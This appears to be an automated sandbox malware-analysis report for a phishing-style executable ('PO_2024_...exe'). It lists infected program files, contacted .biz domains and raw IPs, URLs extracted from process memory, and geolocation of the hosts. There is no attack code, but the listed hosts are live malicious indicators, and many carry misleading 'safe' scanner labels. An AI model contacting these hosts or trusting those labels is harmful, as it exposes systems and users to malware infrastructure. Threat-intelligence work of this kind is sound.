C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://208.117.43.225/gs	0%	Avira URL Cloud	safe
http://54.244.188.177/haobwbcukjixeEK	0%	Avira URL Cloud	safe
http://208.117.43.225:80/pcyutdnis	0%	Avira URL Cloud	safe
http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-	100%	Avira URL Cloud	malware
http://72.52.178.23/8N	0%	Avira URL Cloud	safe
http://54.244.188.177/vcdhvtdni4/	0%	Avira URL Cloud	safe
http://208.117.43.225/pW	0%	Avira URL Cloud	safe
http://208.117.43.225/rbdfcj	0%	Avira URL Cloud	safe
http://34.227.7.138/	0%	Avira URL Cloud	safe
http://18.246.231.120/	0%	Avira URL Cloud	safe
http://208.117.43.225/pcyu	0%	Avira URL Cloud	safe
http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153	100%	Avira URL Cloud	malware
http://54.244.188.177/0	0%	Avira URL Cloud	safe
http://72.52.178.23:80/ewlG	0%	Avira URL Cloud	safe
http://44.221.84.105/tloalmkxssnuris	0%	Avira URL Cloud	safe
http://13.251.16.150/kcogybxqholgdpl0u0umF	0%	Avira URL Cloud	safe
http://82.112.184.197/yrkakyyuj	0%	Avira URL Cloud	safe
http://18.246.231.120/kwsxhlpkribwfg	0%	Avira URL Cloud	safe
http://schemas.microsoft.co	0%	Avira URL Cloud	safe
http://54.244.188.177/mshapsve	0%	Avira URL Cloud	safe
http://44.221.84.105/	0%	Avira URL Cloud	safe
http://54.244.188.177/6noh	0%	Avira URL Cloud	safe
http://54.244.188.177/mshapsvejF	0%	Avira URL Cloud	safe
http://13.251.16.150:80/kcogybxqholgdplrobat	0%	Avira URL Cloud	safe
http://18.141.10.107/snkwxvqngvs_	0%	Avira URL Cloud	safe
http://47.129.31.212/ld	0%	Avira URL Cloud	safe
http://13.251.16.150/kcogybxqholgdpl	0%	Avira URL Cloud	safe
http://208.117.43.225/rbdfcjngs3	0%	Avira URL Cloud	safe
http://82.112.184.197:80/yrkakyyuj	0%	Avira URL Cloud	safe
http://ww7.fwiwk.biz/m?usid=27&utid=10221880067	100%	Avira URL Cloud	phishing
http://72.52.178.23/yN	0%	Avira URL Cloud	safe
http://18.246.231.120/kwsxhlpkribwfgiG	0%	Avira URL Cloud	safe
http://54.244.188.177:80/vcdhvtdnis	0%	Avira URL Cloud	safe
http://208.117.43.225/s	0%	Avira URL Cloud	safe
http://72.52.178.23/~N	0%	Avira URL Cloud	safe
http://72.52.178.23:80/mt0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
76899.bodis.com	199.59.243.227	true	false	high
oshhkdluh.biz	54.244.188.177	true	false	high
jpskm.biz	18.246.231.120	true	false	high
vjaxhpbji.biz	82.112.184.197	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
ifsaia.biz	13.251.16.150	true	false	high
ytctnunms.biz	3.94.10.34	true	false	high
lrxdmhrr.biz	54.244.188.177	true	false	high
tbjrpv.biz	34.246.200.160	true	false	high
saytjshyf.biz	44.221.84.105	true	false	high
084725.parkingcrew.net	13.248.148.254	true	false	high
xlfhhhm.biz	47.129.31.212	true	false	high
fwiwk.biz	72.52.178.23	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
przvgke.biz	72.52.178.23	true	false	high
dwrqljrr.biz	54.244.188.177	true	false	high
myups.biz	165.160.13.20	true	false	high
gytujflc.biz	208.117.43.225	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
knjghuig.biz	18.141.10.107	true	false	high
yunalwv.biz	208.117.43.225	true	false	high
reallyfreegeoip.org	188.114.96.3	true	false	high
deoci.biz	34.227.7.138	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
nqwjmb.biz	35.164.78.200	true	false	high
cvgrf.biz	54.244.188.177	true	false	high
qaynky.biz	13.251.16.150	true	false	high
lpuegx.biz	82.112.184.197	true	false	high
bumxkqgxu.biz	44.221.84.105	true	false	high
vcddkls.biz	18.141.10.107	true	false	high
checkip.dyndns.org	unknown	unknown	false	high
uhxqin.biz	unknown	unknown	false	high
anpmnmxo.biz	unknown	unknown	false	high
ww7.przvgke.biz	unknown	unknown	true	unknown
ww7.fwiwk.biz	unknown	unknown	true	unknown
zlenh.biz	unknown	unknown	false	high
ww12.przvgke.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://bumxkqgxu.biz/vnlfrtbjm	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://lpuegx.biz/yrkakyyuj	false	high
http://yunalwv.biz/pjpssoyxmlc	false	high
http://lrxdmhrr.biz/fncvigkebkn	false	high
http://dwrqljrr.biz/lcaecfwoxcmb	false	high
http://myups.biz/l	false	high
http://ifsaia.biz/kcogybxqholgdpl	false	high
http://checkip.dyndns.org/	false	high
http://lrxdmhrr.biz/lutwptrdxtxh	false	high
http://ssbzmoy.biz/mmfoish	false	high
http://deoci.biz/lgyfu	false	high
http://vcddkls.biz/we	false	high
http://qaynky.biz/rss	false	high
http://xlfhhhm.biz/ld	false	high
http://npukfztj.biz/bufnddtl	false	high
http://gytujflc.biz/rbdfcj	false	high
http://tbjrpv.biz/bilswy	false	high
http://fwiwk.biz/mt	false	high
http://vjaxhpbji.biz/ms	false	high
http://oshhkdluh.biz/vcdhvtdni	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://34.227.7.138/	alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://208.117.43.225/pW	alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://72.52.178.23/8N	zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/vcdhvtdni4/	alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://208.117.43.225/gs	alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	Microsofts.exe, 00000013.00000002.2962626553.00000000025AB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881	alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://54.244.188.177/haobwbcukjixeEK	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1804169295.0000000006A0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://208.117.43.225/rbdfcj	alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-	alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042802989.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://208.117.43.225:80/pcyutdnis	alg.exe, 0000000B.00000003.2509027263.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.246.231.120/	alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cvgrf.biz/	zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	false		high
http://208.117.43.225/pcyu	alg.exe, 0000000B.00000003.2508497113.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://72.52.178.23:80/ewlG	alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xlfhhhm.biz/iz/	alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false		high
http://54.244.188.177/0	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153	zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sajatypeworks.com	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://oshhkdluh.biz/	alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800763144.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378250354.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379239064.0000000001780000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800787635.00000000017C0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800665917.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374357802.00000000007F0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://44.221.84.105/tloalmkxssnuris	zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith	setup.exe0.11.dr	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://82.112.184.197/yrkakyyuj	alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://13.251.16.150/kcogybxqholgdpl0u0umF	alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189d	Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.246.231.120/kwsxhlpkribwfg	alg.exe, 0000000B.00000003.2521205367.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1743418494.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, zeXKjViL.exe, 0000000A.00000002.1969679616.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.microsoft.co	AppVClient.exe, 0000000F.00000003.1738761071.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1739252603.00000000004F2000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1738915554.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1740234733.0000000000502000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE	officesvcmgr.exe.11.dr	false		high
http://54.244.188.177/mshapsve	alg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://44.221.84.105/	alg.exe, 0000000B.00000003.1785481441.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://54.244.188.177/mshapsvejF	alg.exe, 0000000B.00000003.1751167364.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1752034139.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1769440706.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/6noh	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000016.00000002.1815132146.000000000591A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.00000000056F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1	alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://13.251.16.150:80/kcogybxqholgdplrobat	alg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000257C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pcnatrk.net/track.	alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810999604.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	false		high
http://47.129.31.212/ld	alg.exe, 0000000B.00000003.2319647398.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.141.10.107/snkwxvqngvs_	zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://82.112.184.197:80/yrkakyyuj	alg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://13.251.16.150/kcogybxqholgdpl	alg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww7.fwiwk.biz/m?usid=27&utid=10221880067	alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378624503.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2381504483.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379712272.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2389962725.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2421255187.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2507445109.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2456649330.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2380661999.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2395959016.00000000005DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://208.117.43.225/rbdfcjngs3	alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://72.52.178.23/yN	zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.246.231.120/kwsxhlpkribwfgiG	alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff	setup.exe0.11.dr	false		high
http://82.112.184.197/	alg.exe, 0000000B.00000003.2043821981.000000000059C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://72.52.178.23:80/mt0	alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://72.52.178.23/~N	zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://208.117.43.225/s	alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177:80/vcdhvtdnis	alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
13.248.148.254	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
3.94.10.34	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
34.246.200.160	tbjrpv.biz	United States	16509	AMAZON-02US	false
199.59.243.227	76899.bodis.com	United States	395082	BODIS-NJUS	false
35.164.78.200	nqwjmb.biz	United States	16509	AMAZON-02US	false
165.160.13.20	myups.biz	United States	19574	CSCUS	false
34.227.7.138	deoci.biz	United States	14618	AMAZON-AESUS	false
208.117.43.225	gytujflc.biz	United States	32748	STEADFASTUS	false
72.52.178.23	fwiwk.biz	United States	32244	LIQUIDWEBUS	false
44.221.84.105	saytjshyf.biz	United States	14618	AMAZON-AESUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
54.244.188.177	oshhkdluh.biz	United States	16509	AMAZON-02US	false
13.251.16.150	ifsaia.biz	United States	16509	AMAZON-02US	false
47.129.31.212	xlfhhhm.biz	Canada	34533	ESAMARA-ASRU	false
18.246.231.120	jpskm.biz	United States	16509	AMAZON-02US	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
